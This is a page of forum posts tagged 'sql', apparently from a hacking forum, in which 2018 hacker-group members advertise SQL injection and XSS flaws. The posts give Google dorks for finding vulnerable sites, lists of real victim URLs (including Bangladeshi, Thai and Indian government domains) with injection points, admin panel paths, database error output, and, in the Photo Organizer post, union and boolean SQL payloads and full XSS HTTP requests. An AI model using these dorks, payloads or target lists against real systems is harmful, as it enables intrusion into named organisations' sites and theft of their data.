Showing results for tags 'sql'.



187 results found

  1. Pro-Exploit

    # Exploit Title: EZ Launch - SQL Injection
    # Google Dork: Powered By EZ SiteLaunch LTD ext:asp
    # Date: 17/09/2018
    # Author: Rednofozi
    # Team: https://anonysec.org
    # Tested on: Windows 10 x64
    # Vendor Homepage: http://www.ezsitelaunch.com/
    # Software Link: http://www.realestatewebtemplates.com/

    [+] Vulnerable File: main.asp
    [+] Parameter: ID

    [+] Test:
    [+] localhost/main.asp?id=1'

    [+] Returns:
    [+] Microsoft Access Database Engine error '80040e14'
    [+] Syntax error (missing operator) in query expression 'mainID = 1'''.
    [+] /main.asp, line 27

    iran anonysec hackers

    Discovered by : Rednofozi
    Thanks To: ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow
    http://www.exploit4arab.org/exploits/2037
  2. Pro-Exploit

    [+] Title :- Powered by CIA UsA SQL Injection [+] Date :- 2018-09-13 [+] Exploit Author :- Rednofozi [+] Version :- All Versions [+] Tested on :- Linux - Windows [+] Category :- webapps [+] Google Dorks :- 1- 'intext:'' Powered by:CIA' inurl:.php id=' [+] Team name :- Anonysec.org [+] Vendor Homepage :- http://www.bapujidental.edu [+] Official Website :- anonysec [+] Contact :- Rednofozi@yahoo.com ========================================================= demo Injection Injection sql http://www.bapujidental.edu/gallery.php?id=7%27 Injection http://www.bpc.gov.bd/contactus.php?id=13%27 Injection Enjoy ! -------------------------------------------------------------------------------------------- ####################################################### Anonysec hacker iranin ######################################################## ======================================================= # Discovered by : Rednofozi #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow http://www.exploit4arab.org/exploits/2034
  3. [+] Title :- Powered by Special Branch Bangladesh Police SQL Injection [+] Date :- 2018-09-13 [+] Exploit Author :- Rednofozi [+] Version :- All Versions [+] Tested on :- Linux - Windows [+] Category :- webapps [+] Google Dorks :- 1- 'intext:'' Powered by: Special Branch, Bangladesh Police inurl:.php id=' [+] Team name :- Anonysec.org [+] Vendor Homepage :- http://www.immi.gov.bd/ [+] Official Website :- anonysec [+] Contact :- Rednofozi@yahoo.com ========================================================= demo Injection Injection sql http://www.immi.gov.bd/news.php?RecordNo=7%27 Injection http://www.bpc.gov.bd/contactus.php?id=13%27 Injection Enjoy ! -------------------------------------------------------------------------------------------- ####################################################### Anonysec hacker iranin ######################################################## ======================================================= # Discovered by : Rednofozi #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow http://www.exploit4arab.org/exploits/2035
  4. Pro-Exploit

    http://www.exploit4arab.org/exploits/2032 [+] Title :- Powered by:Nasa . SQL Injection [+] Date :- 2018-09-13 [+] Exploit Author :- Rednofozi [+] Version :- All Versions [+] Tested on :- Linux - Windows [+] Category :- webapps [+] Google Dorks :- 1- 'intext:'' Powered by:nasa' inurl:.php id=1' [+] Team name :- Anonysec.org [+] Vendor Homepage :- http://www.platinumplace.co.th [+] Official Website :- anonysec [+] Contact :- Rednofozi@yahoo.com ========================================================= # SQL Database Error => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1013''' at line 1 ============================================================================ Tested on (: Injection test http://www.safersex.co.za/index.php?id=22%27 Injection http://www.dynatekbikes.com/news.php?id=10%27 Injection http://www.platinumplace.co.th/project/gallery.php?id=1%27 Injection Enjoy ! -------------------------------------------------------------------------------------------- ####################################################### Anonysec hacker iranin ######################################################## ======================================================= # Discovered by : Rednofozi #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow
  5. Pro-Exploit

    +] Title :- Designed By Sex . SQL Injection [+] Date :- 2018-09-12 [+] Exploit Author :- Rednofozi [+] Version :- All Versions [+] Tested on :- Linux - Windows [+] Category :- webapps [+] Google Dorks :- 1- 'intext:'' Designed by sex'' inurl:.php id=1' [+] Team name :- Anonysec.org [+] Vendor Homepage :- http://www.safersex.co.za [+] Official Website :- anonysec [+] Contact :- Rednofozi@yahoo.com ========================================================= ============================================================================ Tested on (: http://www.safersex.co.za/index.php?id=22%27 Injection https://lgbttobacco.org/resources.php?ID=22%27 Injection http://www.valepackaging.ca/zoom-admin/index.php Injection Enjoy ! -------------------------------------------------------------------------------------------- ####################################################### Anonysec hacker iranin ######################################################## ======================================================= # Discovered by : Rednofozi #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow http://www.exploit4arab.org/exploits/2031
  6. [+] Title :- Photo Organizer - XSS and SQL Vulnerabilities
     [+] Date :- 2018-09-10
     [+] Exploit Author :- Rednofozi
     [+] Vendor Homepage :- http://po.shaftnet.org/
     [+] Version :- All Versions
     [+] Software Link: :- http://po.shaftnet.org/#download
     [+] Tested on :- Linux - Windows
     [+] Category :- webapps
     [+] Google Dorks :- intext:"Powered by Photo Organizer"
     [+] Team name :- Anonysec.org
     [+] Official Website :- nadaram :d
     [+] Contact :- Rednofozi@yahoo.com

     0x01# ~ Introduction
     ====================
     At its most basic level, Photo Organizer is (yet another) a multiuser web-based photo gallery engine. It differentiates itself by focusing on asset management, aiming at the needs of professional photographers rather than the more typical “I need to share some images on the web and blog about it” crowd. It does not make the assumption that just because you have an image, you want to share it with someone. It combines “we'd like to show people some photos” with “we have a lot of photos we just store and annotate.” To that end, Photo Organizer is highly scalable, capable of handling tens of thousands of images with ease. Coupled with robust importing, exporting, searching, tagging, and printing capabilities, it is intended to act as a photographer's primary image repository.

     0x02# ~ Exploitation
     ====================

     [+] Boolean SQL Injection & Blind [+]

     http://site.com/user.php?user=1 and 1=2
     http://site.com/user.php?user=1 union select 1,2--
     http://site.com/user.php?user=-1 OR 17-7=10

     [+] Reflected XSS Cross Site Scripting [+]

     Affected path(s):
     login.php
     search.text.general.php
     login.php?operation=get_email
     register.php

     == HTTP REQUEST XSS 1 ==
     Host: site.com
     User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
     Accept-Language: en-us
     Accept-Encoding: gzip, deflate
     Referer: http://site.com/login.php
     Connection: keep-alive
     Content-Type: application/x-www-form-urlencoded
     Content-Length: 113
     POST: operation=login&username='"><img+src=x+onerror=prompt(1337);>&password=&auto_login=on&x=0&y=0
     XSS Proof Image: http://i.imgur.com/VmbmuiZ.png

     == HTTP REQUEST XSS 2 ==
     Host: site.com
     User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
     Accept-Language: en-us
     Accept-Encoding: gzip, deflate
     Referer: http://site.com/search.text.general.php
     Connection: keep-alive
     Content-Type: application/x-www-form-urlencoded
     Content-Length: 109
     POST: search_string='"><script>alert('1337')</script>&search_type=&current_user=all&x=0&y=0
     XSS Proof Image: http://i.imgur.com/PDcO50Y.png

     == HTTP REQUEST XSS 3 ==
     Host: site.com
     User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
     Accept-Language: en-us
     Accept-Encoding: gzip, deflate
     Referer: http://site.com/login.php?operation=get_email
     Connection: keep-alive
     Content-Type: application/x-www-form-urlencoded
     Content-Length: 91
     POST: operation=send_info&email='"><script>alert('1337')</script>&x=0&y=0
     XSS Proof Image: http://i.imgur.com/MFc5unu.png

     == HTTP REQUEST XSS 4 ==
     Host: site.com
     User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
     Accept-Language: en-us
     Accept-Encoding: gzip, deflate
     Referer: http://site.com/register.php
     Connection: keep-alive
     Content-Type: application/x-www-form-urlencoded
     Content-Length: 207
     POST: username='"><img+src=x+onerror=prompt(1337);>&password_1=&password_2=&first_name=&last_name=&email=&url=&phone=&company=&address1=&address2=&city=&zipcode=&state=null&country=null&x=0&y=0
     XSS Proof Image: http://i.imgur.com/7T4WZMW.png

     [+] Persistent XSS Cross Site Scripting [+]

     Affected path(s):
     album.add.php?parent=

     == HTTP REQUEST XSS 5 ==
     Host: site.com
     User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
     Accept-Language: en-us
     Accept-Encoding: gzip, deflate
     Referer: http://site.com/album.add.php?parent=
     Cookie: po_session_id=701cc0e40cd083390368f49206b4ccbd
     Connection: keep-alive
     Content-Type: application/x-www-form-urlencoded
     Content-Length: 132
     POST: album_caption='"><script>alert('1337')</script>&parent=null&album_access_rights=3&album_description=&x=0&y=0
     XSS Proof Image: http://i.imgur.com/TrzBqXJ.png

     Anonysec hacker iranin

     # Discovered by : Rednofozi
     #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow
     http://www.exploit4arab.org/exploits/2026
  7. [+] Title :- Designed and Developed By Cloud Innovators Solution SQL Injection Vulnerability [+] Date :- 2018-09-10 [+] Exploit Author :- Rednofozi [+] Vendor Homepage :-http://www.atrium.com.pk [+] Version :- All Versions [+] Tested on :- Linux - Windows [+] Category :- webapps [+] Google Dorks :- 'intext:'' Designed and Developed By Cloud Innovators Solution'' inurl:.php id=1' [+] Team name :- Anonysec.org [+] Official Website :- nadaram :d [+] Contact :- Rednofozi@yahoo.com ========================================================= ######################################################## demos http://www.atrium.com.pk/Gallery.php?ID=4%27 (___SQL Injection___) https://www.sellup.pk/Page.php?ID=1 (___SQL Injection___) http://www.atrium.com.pk/Shopping.php?ID=1%27 (___SQL Injection___) ####################################################### Anonysec hacker iranin ######################################################## ======================================================= # Discovered by : Rednofozi #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow http://www.exploit4arab.org/exploits/2023
  8. [+] Title :- Designed by online store SQL Injection Vulnerability [+] Date :- 2018-09-09 [+] Vendor Homepage :- http://www.jdcaravan.com [+] Version :- All Versions [+] Tested on :- Linux - Windows [+] Category :- webapps [+] Google Dorks :- 'php id= online store' [+] Exploit Author :- Rednofozi [+] Team name :- Anonysec.org [+] Official Website :- nadaram :d [+] Contact :- Rednofozi@yahoo.com ========================================================= ######################################################## demos http://www.jdcaravan.com/store.php?id=1%27 (___SQL Injection___) https://www.bradfordshoes.com/product.php?cat_id=5%27 (___SQL Injection___) http://www.samarpanbharat.org/read_full_news.php?id=1%27 (___SQL Injection___) ####################################################### Anonysec hacker iranin ######################################################## ======================================================= # Discovered by : Rednofozi #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow Like us on Facebook : http://www.exploit4arab.org/exploits/2022
  9. [+] Title :- Website Developed by tanzania SQL Injection Vulnerability [+] Date :- 2018-09-07 [+] Vendor Homepage :- http://www.suhailtours.com [+] Version :- All Versions [+] Tested on :- Linux - Windows [+] Category :- webapps [+] Google Dorks :- 'php id=1 tanzania' [+] Exploit Author :- Rednofozi [+] Team name :- Anonysec.org [+] Official Website :- nadaram :d [+] Contact :- Rednofozi@yahoo.com ========================================================= [+] Request Method(s) :- GET / POST [+] Vulnerable Parameter(s) :- id [+] Affected Area(s) :- Entire admin, database, Server [+] About :- Unauthenticated SQL Injection via Multiple Php Files causing an SQL error ######################################################## demos http://www.imd.gov.in/pages/obs_network.php?id=16%27 (___SQL Injection___) http://www.suhailtours.com/restaurants_list.php?id=2%27 (___SQL Injection___) http://www.samarpanbharat.org/read_full_news.php?id=1%27 (___SQL Injection___) ####################################################### Anonysec hacker iranin ######################################################## ======================================================= # Discovered by : Rednofozi #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow http://www.exploit4arab.org/exploits/2021
  10. |*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*| |[+] Exploit Title: webmaster: jirka@gaysport.cz SQL Injection |*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*| |[+] Exploit Author: Bl4ck M4n |[+] und3rgr0und Telegram @Bl4ckHack |[+] Tested on: Windows 8 , parrot os |[+] saeid.saeid081@gmail.com |[+] joker_s_hack_s@yahoo.com ----------------------------------------------------------------------------- |[+] search google Dork : "webmaster: jirka@gaysport.cz" ----------------------------------------------------------------------------- |[+] Vendor site: http://www.gaysport.cz/ |[+] Demo: Sql |[+] http://www.gaysport.cz/index.php?id=2 |*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|*|
  11. ################################################################################################# # Exploit Title : Powered By invitroestudio Argentina SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 08/09/2018 # Vendor Homepage : invitroestudio.com.ar # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] ################################################################################################# # Google Dork : intext:''Powered By invitroestudio'' site:ar # Exploit : /productos-grid.php?idsubcat=[SQL Injection] /productos-grid.php?idsubcat=[ID-NUMBER]&marca=Taloffice&orden=[ID-NUMBER]&desde=[SQL Injection] ################################################################################################# # Example Site => clipers.com.ar/productos-grid.php?idsubcat=14%27 => [ Proof of Concept ] => archive.is/D2ATZ clipers.com.ar/productos-grid.php?idsubcat=14&marca=Taloffice&orden=3&desde=0%27 # SQL Database Error => Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in /home2/cliper/public_html/productos-grid.php on line 891
  12. ################################################################################################# # Exploit Title : Diseño y Desarrollo LastClick Argentina SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 08/09/2018 # Vendor Homepage : lastclick.com.ar # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] ################################################################################################# # Google Dork : intext:''Desarrollo: www.lastclick.com.ar | Corrientes - Argentina'' Admin Control Panel Path => /admin/index.php # Exploit : /seccion.php?pagina=[SQL Injection] /seccion.php?pagina=[ID-NUMBER]&id=[SQL Injection] /ver_nota.php?id=[SQL Injection] ################################################################################################# # Example Site => saladasinforma.com.ar/seccion.php?pagina=437&id=3%27 => [ Proof of Concept ] => archive.is/7q7Xe # SQL Database Error => Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in /home/saladasi/public_html/objetos/DBConnection.php on line 209
  13. ################################################################################################# # Exploit Title : Powered By PAS World Communitcation Ltd and Nakhonkorat ThailandGov SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 10/09/2018 # Vendor Homepage : nakhonkorat.com # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] ################################################################################################# # Google Dork : intext:''Powered By :: PAS World Communitcation,.ltd. AND nakhonkorat.com'' # Admin Control Panel Path => /admin/index.php # Exploit : /news.php?cat_id=[SQL Injection] /detail.php?id=[SQL Injection] ################################################################################################# # Example Site => talasupcity.go.th/news.php?cat_id=1%27 => [ Proof of Concept ] => archive.is/3iibd lamkaen.go.th/news.php?cat_id=14%27 suankluay.go.th/detail.php?id=251%27 klongkiew.go.th/detail.php?id=1%27 thungwa.go.th/detail.php?id=1%27 bangpradaeng.go.th/detail.php?id=1%27 sunthornphu.go.th/detail.php?id=1%27 senauthai.go.th/detail.php?id=1%27 chedihak.go.th/detail.php?id=1%27 # SQL Database Error => You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '' ORDER BY d_date DESC, created' at line 1
  14. ################################################################################################# # Exploit Title : BizPotential EasyWebTime 8.6.2 Thailand Government SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 10/09/2018 # Vendor Homepage : bizpotential.com ~ ewtadmin.com # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] ################################################################################################# # Google Dorks : inurl:''/ewtadmin/'' site:go.th inurl:''/main.php?filename='' site:go.th inurl:''/ewtadmin/ewt/ccs/'' intext:''© Copyright 2007 - BizPotential.com - All Rights Reserved.'' intext:''Copyright 2007 - BizPotential Co., Ltd. - All Rights Reserved'' ################################################################################################# # Admin Control Panel Paths => /ewtadmin/index.php /ewtadmin82/ /ewtcommittee/index2331.php /ewtadmin/ewt/DOMAINNAMEHERE_intranet/ewt_login.php # SQL Injection Exploit : /n_more3.php?page=[ID-NUMBER]&c_id=[SQL Injection] /ewtadmin/ewt/[DOMAINNAME_web/n_more.php?c_id=[SQL Injection] /more_news.php?offset=[SQL Injection] /more_news.php?offset=-[ID-NUMBER]&cid=&startoffset=[SQL Injection] ################################################################################################# # Webboard Exploit : /ewtadmin/ewt/ccs/addquestion.php?wcad=5&t=1&filename=webboard # Webboar Directory Path : /ewtadmin/ewt/ccs/index_question.php?wcad=5&t=1&filename=webboard ccs.DOMAINNAME.go.th/index_question.php?wcad=5&t=1&filename=webboard ################################################################################################# # Example Site => Thailand Government Chachoengsao Cooperative Auditing Office cad.go.th/ewtadmin/ewt/ccs/addquestion.php?wcad=5&t=1\%27&filename=webboard 
cad.go.th/ewtadmin/ewt/ccs/index_question.php?wcad=5&t=1&filename=webboard ccs.cad.go.th/index_question.php?wcad=5&t=1&filename=webboard ################################################################################################# Thailand Government Department of Mineral Sources # Example Sites => dmr.go.th/n_more3.php?page=0&c_id=199%27 => [ Proof of Concept ] => dmr.go.th/ewtadmin/ewt/dmr_web/n_more.php?c_id=556%27 => [ Proof of Concept ] => archive.is/bUcka # SQL Database Error => SELECT * FROM article_list WHERE c_id = '199'' and n_approve = 'Y' ORDER BY n_date DESC LIMIT -20,20 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20,20' at line 1 Thailand Government Office of Consumer Protection Board # ocpb.go.th/more_news.php?offset=-30&cid=&startoffset=-10%27 => [ Proof of Concept ] => archive.is/inA3o # SQL Database Error => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-30, 10' at line 3 Thailand Government Ministry of Culture and Cooperatives - Auditing Department # cad.go.th/cadweb_eng/ewt_w3c/more_news.php?offset=60%27 => [ Proof of Concept ] => archive.is/a4XYx # SQL Database Error => Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in D:\WWW\ewtadmin\ewt\cadweb_eng\lib\function.php on line 101 SELECT * FROM article_list WHERE ( c_id = '' ) AND n_approve = 'Y' AND (('2561-09-10 05:57:13' between n_date_start and n_date_end) or (n_date_start = '' and n_date_end = '')) ORDER BY n_date DESC,n_timestamp DESC LIMIT 60\\\',20 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\',20' at line 1
  15. ==================================================================================================================================== | # Title : brsis sql injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) | | # Vendor : http://www.brsis.com.br/ | | # Dork : "Produzido por Brsis" | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine . [+] http://www.jj.ind.br/produtos.php?idlinha=2 <=== inject here [+] http://www.jj.ind.br/extranet/index.php <==== Panel
  16. ################################################################################################# # Exploit Title : Diseño y Desarrollo D&H Soluciones Argentina SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 08/09/2018 # Vendor Homepage : dyhsoluciones.com.ar # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] ################################################################################################# # Google Dork : intext:''Diseño y Desarrollo: D&H Soluciones'' # Exploit : /productos-listado.php?_pagi_pg=[SQL Injection] /producto.php?id=[SQL Injection] ################################################################################################# # Example Site => mapaequipamientos.com.ar/productos-listado.php?_pagi_pg=357' => [ Proof of Concept ] => archive.is/ycpMz # SQL Database Error => Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/mapa/public_html/inc/productos-listado.php on line 63 Error en la consulta de conteo de registros: SELECT COUNT(*) FROM contenido_web inner join contenido_web_x_categorias on contenido_web.id = contenido_web_x_categorias.idContenido where contenido_web_x_categorias.idCategorias = 38 order by contenido_web.fecha desc. Mysql dijo: Table 'mapa_dyhcms.contenido_web' doesn't exist
  17. ################################################################################################# # Exploit Title : Sitio oficial de Jeep® Argentina Powered By Turnos SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 08/09/2018 # Vendor Homepage : jeep.com.ar # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] ################################################################################################# # Google Dork : intext:''©2017 FCA US LLC. Todos los derechos reservados.Chrysler, Dodge, Jeep, Ram, Mopar y SRT son marcas registradas de FCA US LLC.'' Admin Control Panel Path => /admin/ # Exploit : /index.php?action=turnos&id_actividad=[SQL Injection] /index.php?action=turnos&id_actividad=[ID-NUMBER]&id_vehiculo=&year=[ID-NUMBER]&month=[ID-NUMBER]&day=[ID-NUMBER]&desde=[ID-NUMBER]&hasta=[SQL Injection] ################################################################################################# # Example Site => offroadparkverano.com.ar/index.php?action=turnos&id_actividad=3%27 => [ Proof of Concept ] => archive.is/c9aOS offroadparkverano.com.ar/index.php?action=turnos&id_actividad=3&id_vehiculo=&year=2019&month=02&day=20&desde=1800&hasta=2130%27 => [ Proof of Concept ] => archive.is/rAbHR # SQL Database Error => Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/adminh4/public_html/turnos.php on line 20 mysql_error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
  18. [+] Title :- JET Database Germany SQL Injection Vulnerability [+] Date :- 2018-09-07 [+] Vendor Homepage :- www.spruehwerk.de [+] Version :- All Versions [+] Tested on :- Linux - Windows [+] Category :- webapps [+] Google Dorks :- intext:"JET Database" +site:de [+] Exploit Author :- Rednofozi [+] Team name :- Anonysec.org [+] Official Website :- nadaram :d [+] Contact :- Rednofozi@yahoo.com ========================================================= ######################################################## demos http://www.spruehwerk.de/new/galerie/Innen/0xp3xr07vv220.htm ####################################################### Anonysec hacker iranin ######################################################## ======================================================= # Discovered by : Rednofozi #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow http://www.exploit4arab.org/exploits/2018
  19. [+] Title :- Designed & Developed by france SQL Injection Vulnerability [+] Date :- 2018-09-06 [+] Vendor Homepage :- http://www.romanianwriters.ro/ [+] Version :- All Versions [+] Tested on :- Linux - Windows [+] Category :- webapps [+] Google Dorks :- site .fr inurl .php id=1 [+] Exploit Author :- Rednofozi [+] Team name :- Anonysec.org [+] Official Website :- nadaram :d [+] Contact :- Rednofozi@yahoo.com ========================================================= [+] Request Method(s) :- GET / POST [+] Vulnerable Parameter(s) :- id [+] Affected Area(s) :- Entire admin, database, Server [+] About :- Unauthenticated SQL Injection via Multiple Php Files causing an SQL error ######################################################## demoshttp://www.romanianwriters.ro/s.php?id=1%27 (___SQL Injection___) http://www.com2go.com/index.php?id=26%27 (___SQL Injection___) https://www.dt-shop.com/index.php?id=3&L=1' (___SQL Injection___) ####################################################### Anonysec hacker iranin ######################################################## ======================================================= # Discovered by : Rednofozi #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow http://www.exploit4arab.org/exploits/2017
  20. [+] Title :- Designed & Developed by qatar SQL Injection Vulnerability [+] Date :- 2018-09-06 [+] Vendor Homepage :- http://www.merjs-qatar.com [+] Version :- All Versions [+] Tested on :- Linux - Windows [+] Category :- webapps [+] Google Dorks :- 'php id=1 qatar' [+] Exploit Author :- Rednofozi [+] Team name :- Anonysec.org [+] Official Website :- nadaram :d [+] Contact :- Rednofozi@yahoo.com ========================================================= [+] Request Method(s) :- GET / POST [+] Vulnerable Parameter(s) :- id [+] Affected Area(s) :- Entire admin, database, Server [+] About :- Unauthenticated SQL Injection via Multiple Php Files causing an SQL error ######################################################## demos http://www.supremetech.me/services.php?id=24%27 (___SQL Injection___) http://hdecoqatar.com/gallery.php?id=1%27 (___SQL Injection___) http://www.merjs-qatar.com/projects.php?id=1%27 (___SQL Injection___) ####################################################### Anonysec hacker iranin ######################################################## ======================================================= # Discovered by : Rednofozi #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow http://www.exploit4arab.org/exploits/2016
  21. ######################################################
      # Title : Web Design .sa.php saudi arabia www.azdan.com.sa Sql injection Vulnerability
      # Author : AnonySec
      # category : webapps
      # Tested On : Win 10 , Kali Linux
      # my team: www.anonysec.org
      # Vendor HomePage : www.azdan.com.sa
      # Google Dork: '.sa.php id='
      ######################################################
      # Search google Dork : '.sa.php id='
      # inject sql codes ......
      #Demo :
      http://www.ftc.com.sa/group-info.php?id=13%27' (Sql Injection)
      http://www.pumps-hv.com/news.php?id=218%27' (Sql Injection)
      # Discovered by : Moeein Seven | www.moeein.ir
      #--tnx to : ReZa CLONER , Rednofozi , SheikhShahin , MiladShadow and all bax from anonysec team.....
      http://www.exploit4arab.org/exploits/2015
  22. ######################################################
      # Title : Web Design saudi hotels Sql injection Vulnerability
      # Author : AnonySec
      # category : webapps
      # Tested On : Win 10 , Kali Linux
      # my team: www.anonysec.org
      # Vendor HomePage : www.retajalrayyan.com
      # Google Dork: 'php id= saudi hotels'
      ######################################################
      # Search google Dork : 'php id= saudi hotels'
      # inject sql codes ......
      #Demo :
      http://www.retajroyaledoha.com/offer.php?id=13%27' (Sql Injection)
      http://www.retajalrayyan.com/offer.php?id=22%27' (Sql Injection)
      # Discovered by : Moeein Seven | www.moeein.ir
      #--tnx to : ReZa CLONER , Rednofozi , SheikhShahin , MiladShadow and all bax from anonysec team.....
      http://www.exploit4arab.org/exploits/2014
  23. #################################################################################################
      # Exploit Title : Hoteliraqua Todos los Derechos Reservados © 2013 SQL Injection Vulnerability
      # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
      # Date : 07/09/2018
      # Vendor Homepage : hoteliraqua.com
      # Tested On : Windows and Linux
      # Category : WebApps
      # Exploit Risk : Medium
      # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
      #################################################################################################
      # Google Dork : intext:''www.hoteliraqua.com - Todos los Derechos Reservados © 2013''
      # Exploit : /Reservas.php?id=[SQL Inj]
      #################################################################################################
      # Example Site => hoteliraqua.com/Reservas.php?id=5%27 => [ Proof of Concept ] => archive.is/tOVc9
      # SQL Database Error => Error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''5''' at line 1 SELECT `Content`,`Title`,`Menu` FROM site_web WHERE PageID = '5''
      #################################################################################################
      # Discovered By KingSkrupellos
  24. #################################################################################################
      # Exploit Title : ReturnDates is under the care of (c) ThePopeRope SQL Injection Vulnerability
      # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
      # Date : 07/09/2018
      # Vendor Homepage : returndates.com
      # Tested On : Windows and Linux
      # Category : WebApps
      # Exploit Risk : Medium
      # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
      #################################################################################################
      # Google Dork : intext:''Returndates.com is under the care of (c) Thepoperope.''
      # Exploit : /news.php?id=[SQL Inj]
      #################################################################################################
      # Example Site => returndates.com/news.php?id=6122%27
      # SQL Database Error => Warning: mysql_numrows() expects parameter 1 to be resource, boolean given in /mounted-storage/home63c/sub005/sc41041-ECUF/returndates.com/news.php on line 216
      #################################################################################################
      # Discovered By KingSkrupellos
  25. #################################################################################################
      # Exploit Title : India Ministry of Earth Sciences Meteorological Department SQL Injection Vulnerability
      # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
      # Date : 07/09/2018
      # Vendor Homepage : imd.gov.in
      # Tested On : Windows and Linux
      # Category : WebApps
      # Exploit Risk : Medium
      # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
      #################################################################################################
      # Google Dork : intext:''Copyright © India Meteorological Department 2015 This Website belongs to India Meteorological Department, Ministry of Earth Sciences,Government of India''
      # Exploit : /PATH/obs_network.php?id=[SQL Inj]
      #################################################################################################
      # Example Site => imd.gov.in/pages/obs_network.php?id=16' => [ Proof of Concept ] => archive.is/zaH4f
      # SQL Database Error => You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '%') ORDER BY obs_name' at line 1
      #################################################################################################
      # Discovered By KingSkrupellos